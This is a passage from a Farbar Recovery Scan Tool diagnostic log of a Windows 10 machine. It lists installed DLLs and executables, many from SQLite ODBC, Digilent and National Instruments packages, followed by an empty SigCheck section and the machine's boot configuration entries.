Consulting) C:\Program Files\sqlite3odbcnw.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000078848 _____ (Christian Werner Software & Consulting) C:\Program Files\sqlite3_mod_blobtoxy.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000062464 _____ C:\Program Files\sqlite3_mod_csvtable.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000059904 _____ C:\Program Files\sqlite3_mod_extfunc.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000150528 _____ C:\Program Files\sqlite3_mod_fts3.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000057344 _____ C:\Program Files\sqlite3_mod_impexp.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000062464 _____ C:\Program Files\sqlite3_mod_rtree.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000101376 _____ C:\Program Files\sqlite3_mod_zipfile.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\uninst.exe 2018-10-09 22:52 - 2018-10-09 22:52 - 000063202 _____ C:\Program Files\Uninstall.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\uninstq.exe 2017-07-27 10:52 - 1998-10-29 16:45 - 000306688 _____ (InstallShield Software Corporation) C:\WINDOWS\IsUninst.exe 2013-08-22 17:15 - 2013-08-22 17:15 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l2-1-1.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-psm-appnotify-l1-1-0.dll 2013-08-22 17:13 - 2013-08-22 17:13 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-devices-config-l1-1-1.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000003584 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-mm-misc-l1-1-1.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-rtcore-ntuser-winevent-l1-1-0.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-cryptoapi-l1-1-0.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000070144 _____ (Digilent, Inc.) C:\WINDOWS\system32\dabs.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000017408 _____ (Digilent, Inc.) C:\WINDOWS\system32\daci.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000022528 _____ (Digilent, Inc.) C:\WINDOWS\system32\daio.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000026624 _____ (Digilent, Inc.) C:\WINDOWS\system32\demc.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000016384 _____ (Digilent, Inc.) C:\WINDOWS\system32\depp.dll 2014-11-22 06:45 - 2014-11-22 06:45 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\dfp.exe 2014-11-22 06:45 - 2014-11-22 06:45 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\DfpCommon.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000016384 _____ (Digilent, Inc.) C:\WINDOWS\system32\dgio.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000025600 _____ (Digilent, Inc.) C:\WINDOWS\system32\djtg.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000017920 _____ (Digilent, Inc.) C:\WINDOWS\system32\dmgr.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000017408 _____ (Digilent, Inc.) C:\WINDOWS\system32\dmgt.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 002339328 _____ (Digilent, Inc.) C:\WINDOWS\system32\dpcomm.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000030720 _____ (Digilent, Inc.) C:\WINDOWS\system32\dpcutil.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000016384 _____ (Digilent, Inc.) C:\WINDOWS\system32\dpio.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000014848 _____ (Digilent, Inc.) C:\WINDOWS\system32\dpti.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000018432 _____ (Digilent, Inc.) C:\WINDOWS\system32\dspi.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000013824 _____ (Digilent, Inc.) C:\WINDOWS\system32\dstm.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000018432 _____ (Digilent, Inc.) C:\WINDOWS\system32\dtwi.dll 2018-01-23 22:06 - 2014-11-18 14:46 - 000017504 _____ C:\WINDOWS\system32\EuEpmGdi.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000003584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ext-ms-win-msa-ui-l1-1-0.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\system32\ext-ms-win-ntuser-misc-l1-2-0.dll 2013-08-22 17:12 - 2013-08-22 17:12 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ext-ms-win-rtcore-ntuser-dpi-l1-1-0.dll 2014-10-03 22:29 - 2014-10-03 22:29 - 000123392 _____ (Digilent, Inc.) C:\WINDOWS\system32\jtsc.dll 2014-11-22 09:55 - 2014-11-22 09:55 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\lockscreencn.dll 2015-11-25 04:23 - 2015-11-25 04:23 - 000243392 _____ (Intel Corporation) C:\WINDOWS\system32\niimaqtbb.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000053760 _____ C:\WINDOWS\system32\niwjelement.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000019456 _____ C:\WINDOWS\system32\niwjreader.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000018432 _____ C:\WINDOWS\system32\niwjwriter.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000013312 _____ C:\WINDOWS\system32\nixpl.dll 2014-11-22 09:18 - 2014-11-22 09:18 - 000733696 _____ (Microsoft Corporation) C:\WINDOWS\system32\SkyDriveTelemetry.dll 2018-10-09 22:52 - 2014-09-20 21:29 - 000858624 _____ (Christian Werner Software & Consulting) C:\WINDOWS\system32\sqlite3odbc.dll 2018-10-09 22:52 - 2014-09-20 21:29 - 000078848 _____ (Christian Werner Software & Consulting) C:\WINDOWS\system32\sqlite3_mod_blobtoxy.dll 2018-10-09 22:52 - 2014-09-20 21:29 - 000062464 _____ C:\WINDOWS\system32\sqlite3_mod_csvtable.dll 2018-10-09 22:52 - 2014-09-20 21:30 - 000059904 _____ C:\WINDOWS\system32\sqlite3_mod_extfunc.dll 2018-10-09 22:52 - 2014-09-20 21:30 - 000150528 _____ C:\WINDOWS\system32\sqlite3_mod_fts3.dll 2018-10-09 22:52 - 2014-09-20 21:29 - 000057344 _____ C:\WINDOWS\system32\sqlite3_mod_impexp.dll 2018-10-09 22:52 - 2014-09-20 21:30 - 000062464 _____ C:\WINDOWS\system32\sqlite3_mod_rtree.dll 2018-10-09 22:52 - 2014-09-20 21:29 - 000101376 _____ C:\WINDOWS\system32\sqlite3_mod_zipfile.dll 2013-08-22 09:47 - 2013-08-22 09:47 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l2-1-1.dll 2013-08-22 09:44 - 2013-08-22 09:44 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-psm-appnotify-l1-1-0.dll 2013-08-22 09:44 - 2013-08-22 09:44 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-devices-config-l1-1-1.dll 2013-08-22 09:44 - 2013-08-22 09:44 - 000003584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-mm-misc-l1-1-1.dll 2013-08-22 09:44 - 2013-08-22 09:44 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-rtcore-ntuser-winevent-l1-1-0.dll 2013-08-22 09:44 - 2013-08-22 09:44 - 000004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-cryptoapi-l1-1-0.dll 2015-03-17 01:34 - 2015-03-17 01:34 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atl71.dll 2009-03-19 14:35 - 2009-03-19 14:35 - 000118784 _____ ( National Instruments Corporation) C:\WINDOWS\SysWOW64\clallserial.dll 2017-01-24 03:10 - 2017-01-24 03:10 - 000123392 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\clsernat.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000051712 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dabs.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000015872 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\daci.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000020480 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\daio.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000323639 _____ (Hilscher GmbH) C:\WINDOWS\SysWOW64\Dbm32.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000025088 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\demc.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000013312 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\depp.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000014848 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dgio.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000021504 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\djtg.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000014848 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dmgr.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000014848 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dmgt.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 002307072 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dpcomm.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000024576 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dpcutil.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000014336 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dpio.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000012288 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dpti.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000015360 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dspi.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000012288 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dstm.dll 2014-10-03 22:28 - 2014-10-03 22:28 - 000015360 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\dtwi.dll 2018-01-23 22:06 - 2014-11-18 14:46 - 000021088 _____ C:\WINDOWS\SysWOW64\EuEpmGdi.dll 2013-08-22 09:44 - 2013-08-22 09:44 - 000003584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ext-ms-win-msa-ui-l1-1-0.dll 2013-08-22 09:44 - 2013-08-22 09:43 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ext-ms-win-ntuser-misc-l1-2-0.dll 2013-08-22 09:44 - 2013-08-22 09:43 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ext-ms-win-rtcore-ntuser-dpi-l1-1-0.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000462848 _____ (eHelp Corporation.) C:\WINDOWS\SysWOW64\HHActiveX.dll 1998-10-15 15:28 - 1998-10-15 15:28 - 000085504 _____ (Blue Sky Software Corporation.) C:\WINDOWS\SysWOW64\HtmlWH.dll 2017-03-13 04:36 - 2017-03-13 04:36 - 000826880 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\hypertrend.dll 2017-03-24 18:32 - 2017-03-24 18:32 - 000018541 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\imaqios.dll 2017-07-27 10:57 - 1999-01-18 09:32 - 000032768 _____ C:\WINDOWS\SysWOW64\inst_pm.exe 2014-10-03 22:28 - 2014-10-03 22:28 - 000103424 _____ (Digilent, Inc.) C:\WINDOWS\SysWOW64\jtsc.dll 2003-04-09 10:25 - 2003-04-09 10:25 - 000708678 _____ (National Instruments, Inc.) C:\WINDOWS\SysWOW64\lkhistdl.dll 2003-04-09 10:26 - 2003-04-09 10:26 - 000176195 _____ (National Instruments, Inc.) C:\WINDOWS\SysWOW64\lkmxs.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000053248 _____ C:\WINDOWS\SysWOW64\Lynxw32.dll 2009-07-11 16:35 - 2009-07-11 16:35 - 001060864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc71.dll 2015-03-17 01:34 - 2015-03-17 01:34 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71CHS.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71CHT.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71DEU.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71ENU.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71ESP.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71FRA.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71ITA.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71JPN.DLL 2015-03-17 01:34 - 2015-03-17 01:34 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFC71KOR.DLL 2009-07-11 16:51 - 2009-07-11 16:51 - 001053696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc71u.dll 2004-02-23 20:42 - 2004-02-23 20:42 - 000119808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msstdfmt.dll 2000-08-02 13:44 - 2000-08-02 13:44 - 000094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msstkprp.dll 2006-07-11 17:35 - 2006-07-11 17:35 - 000503808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp71.dll 2006-07-11 17:35 - 2006-07-11 17:35 - 000348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr71.dll 2017-05-15 15:16 - 2017-05-15 15:16 - 000229376 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nicrtsiu.dll 2017-04-26 20:47 - 2017-04-26 20:47 - 000009728 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nidscmem.dll 2017-03-13 04:36 - 2017-03-13 04:36 - 000025088 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nidscsma.dll 2017-03-20 20:18 - 2017-03-20 20:18 - 000187392 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\NiFpga.dll 2016-10-11 17:14 - 2016-10-11 17:14 - 000032256 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nigvsp.dll 2015-11-25 04:23 - 2015-11-25 04:23 - 000126976 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\niimaqtbb.dll 2017-05-15 15:17 - 2017-05-15 15:17 - 000023040 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\niprtsiu.dll 2017-03-20 20:27 - 2017-03-20 20:27 - 000093184 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\niriodevenum.dll 2017-03-20 20:19 - 2017-03-20 20:19 - 000114176 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\niriosaeDesktop.dll 2017-03-20 20:28 - 2017-03-20 20:28 - 000034816 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\niriosession.dll 2017-03-20 20:18 - 2017-03-20 20:18 - 000398848 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\NiRioSrvEnumeratorPlugin.dll 2003-09-24 16:51 - 2003-09-24 16:51 - 000598016 _____ (National Instruments) C:\WINDOWS\SysWOW64\NIScale.dll 2017-05-15 14:49 - 2017-05-15 14:49 - 000039936 _____ C:\WINDOWS\SysWOW64\niscdrau.dll 2015-11-25 04:23 - 2015-11-25 04:23 - 000037376 _____ C:\WINDOWS\SysWOW64\nitbbmall.dll 2017-05-11 19:47 - 2017-05-11 19:47 - 000029184 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nitfuru.dll 2017-03-24 18:28 - 2017-03-24 18:28 - 000067584 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\niu3v.dll 2016-10-04 20:04 - 2016-10-04 20:04 - 000040448 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nivisriobd.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000044032 _____ C:\WINDOWS\SysWOW64\niwjelement.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000016384 _____ C:\WINDOWS\SysWOW64\niwjreader.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000013312 _____ C:\WINDOWS\SysWOW64\niwjwriter.dll 2017-03-16 02:24 - 2017-03-16 02:24 - 002331648 _____ (National Instruments Corporation) C:\WINDOWS\SysWOW64\nixerces30.dll 2017-04-17 01:25 - 2017-04-17 01:25 - 000010240 _____ C:\WINDOWS\SysWOW64\nixpl.dll 2017-07-27 10:57 - 1999-01-18 10:06 - 000069632 _____ C:\WINDOWS\SysWOW64\oncrpc.dll 2005-11-25 15:56 - 2005-11-25 15:56 - 000233472 _____ (OPC Foundation) C:\WINDOWS\SysWOW64\OPCDAAuto.dll 2017-07-27 10:57 - 1999-01-18 10:06 - 000036864 _____ C:\WINDOWS\SysWOW64\pm_ascii.exe 2017-07-27 10:57 - 1999-01-18 09:32 - 000040960 _____ C:\WINDOWS\SysWOW64\portmap.exe 2013-03-01 07:17 - 2013-03-01 07:17 - 000053299 _____ C:\WINDOWS\SysWOW64\pthreadVC.dll 2018-04-30 16:23 - 2018-04-30 16:23 - 002647552 _____ (Python Software Foundation) C:\WINDOWS\SysWOW64\python27.dll 2017-07-27 10:57 - 1997-04-14 09:42 - 000040960 _____ C:\WINDOWS\SysWOW64\rpcinfo.exe 2016-01-08 12:08 - 2016-01-08 12:08 - 000086016 _____ C:\WINDOWS\SysWOW64\scrs232.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000077824 _____ C:\WINDOWS\SysWOW64\sctcpip.dll 2010-06-21 17:19 - 2010-06-21 17:19 - 000036864 _____ (TOSHIBA/MEI) C:\WINDOWS\SysWOW64\SDDEVMGR.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000053248 _____ C:\WINDOWS\SysWOW64\Supercom.dll 2017-11-04 16:40 - 2004-05-27 01:32 - 000102400 _____ (Info-ZIP) C:\WINDOWS\SysWOW64\unzip32.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000065536 _____ C:\WINDOWS\SysWOW64\_Isolynx.dll 2016-01-08 12:08 - 2016-01-08 12:08 - 000036864 _____ C:\WINDOWS\SysWOW64\_Super.dll 2019-07-04 22:54 - 2019-07-04 22:54 - 002420224 _____ (Farbar) C:\Users\virk_ps\Downloads\FRST64.exe 2018-02-25 20:47 - 2018-02-25 20:47 - 014497553 _____ (YTD ) C:\Users\virk_ps\Downloads\ytd6-setup.exe ==================== SigCheck =============================== (There is no automatic fix for files that do not pass verification.) ==================== BCD ================================ Windows Boot Manager -------------------- identifier {bootmgr} device partition=\Device\HarddiskVolume1 description Windows Boot Manager locale en-GB inherit {globalsettings} default {current} resumeobject {e4c7a947-62db-11e9-b178-c1893c5a6acb} displayorder {current} toolsdisplayorder {memdiag} timeout 30 Windows Boot Loader ------------------- identifier {24ec37d1-9e6d-11e9-902e-ed9df89525c7} device ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{24ec37d2-9e6d-11e9-902e-ed9df89525c7} path \windows\system32\winload.exe description Windows Recovery Environment locale en-GB inherit {bootloadersettings} displaymessage Recovery osdevice ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{24ec37d2-9e6d-11e9-902e-ed9df89525c7} systemroot \windows nx OptIn bootmenupolicy Standard winpe Yes Windows Setup ------------- identifier {cbd971bf-b7b8-4885-951a-fa03044f5d71} device ramdisk=[C:]\$WINDOWS.~BT\Sources\SafeOS\winre.wim,{e4c7a949-62db-11e9-b178-c1893c5a6acb} bootstatdevice partition=C: custom:11000083 partition=C: path \windows\system32\winload.exe description Windows Rollback locale en-GB bootstatfilepath \$WINDOWS.~BT\Sources\SafeOS\bootstat.dat inherit {bootloadersettings} restartonfailure Yes osdevice ramdisk=[C:]\$WINDOWS.~BT\Sources\SafeOS\winre.wim,{e4c7a949-62db-11e9-b178-c1893c5a6acb} custom:21000152 partition=C: systemroot \windows nx OptIn bootmenupolicy Standard winpe Yes Windows Boot Loader ------------------- identifier {e4c7a945-62db-11e9-b178-c1893c5a6acb} device ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{e4c7a946-62db-11e9-b178-c1893c5a6acb} path \windows\system32\winload.exe description Windows Recovery Environment locale en-GB inherit {bootloadersettings} displaymessage Recovery osdevice ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{e4c7a946-62db-11e9-b178-c1893c5a6acb} systemroot \windows nx OptIn bootmenupolicy Standard winpe Yes Windows Boot Loader ------------------- identifier {current} device partition=C: path \WINDOWS\system32\winload.exe description Windows 10 locale en-GB inherit {bootloadersettings} recoverysequence {24ec37d1-9e6d-11e9-902e-ed9df89525c7} displaymessageoverride Recovery recoveryenabled Yes allowedinmemorysettings 0x15000075 osdevice partition=C: systemroot \WINDOWS resumeobject {e4c7a947-62db-11e9-b178-c1893c5a6acb} nx OptIn bootmenupolicy Standard Resume from Hibernate --------------------- identifier {4faeb19f-4cef-11e8-8bd6-a0bedb55cd1d} device partition=C: path \WINDOWS\system32\winresume.exe description Windows Resume Application locale en-GB inherit {resumeloadersettings} recoverysequence {e4c7a945-62db-11e9-b178-c1893c5a6acb} recoveryenabled Yes allowedinmemorysettings 0x15000075 filedevice partition=C: filepath \hiberfil.sys bootmenupolicy Standard debugoptionenabled No Resume from Hibernate --------------------- identifier {e4c7a947-62db-11e9-b178-c1893c5a6acb} device partition=C: path \WINDOWS\system32\winresume.exe description Windows Resume Application locale en-GB inherit {resumeloadersettings} recoverysequence {24ec37d1-9e6d-11e9-902e-ed9df89525c7} recoveryenabled Yes allowedinmemorysettings 0x15000075 filedevice partition=C: filepath \hiberfil.sys bootmenupolicy Standard debugoptionenabled No Windows Memory Tester --------------------- identifier {memdiag} device partition=\Device\HarddiskVolume1 path \boot\memtest.exe description Windows Memory Diagnostic locale en-GB inherit {globalsettings} badmemoryaccess Yes EMS Settings ------------ identifier {emssettings} bootems No Debugger Settings ----------------- identifier {dbgsettings} debugtype Serial debugport 1 baudrate 115200 RAM Defects ----------- identifier {badmemory} Global Settings --------------- identifier {globalsettings} inherit {dbgsettings} {emssettings} {badmemory} Boot Loader Settings -------------------- identifier {bootloadersettings} inherit {globalsettings} {hypervisorsettings} Hypervisor Settings ------------------- identifier {hypervisorsettings} hypervisordebugtype Serial hypervisordebugport 1 hypervisorbaudrate 115200 Resume Loader Settings ---------------------- identifier {resumeloadersettings} inherit {globalsettings} Device options -------------- identifier {24ec37d2-9e6d-11e9-902e-ed9df89525c7} description Windows Recovery ramdisksdidevice partition=C: ramdisksdipath \Recovery\WindowsRE\boot.sdi Device options -------------- identifier {e4c7a946-62db-11e9-b178-c1893c5a6acb} description Windows Recovery ramdisksdidevice partition=C: ramdisksdipath \Recovery\WindowsRE\boot.sdi Device options -------------- identifier {e4c7a949-62db-11e9-b178-c1893c5a6acb} description Windows Setup ramdisksdidevice partition=C: ramdisksdipath \$WINDOWS.~BT\Sources\SafeOS\boot.sdi ==================== End of FRST.txt ============================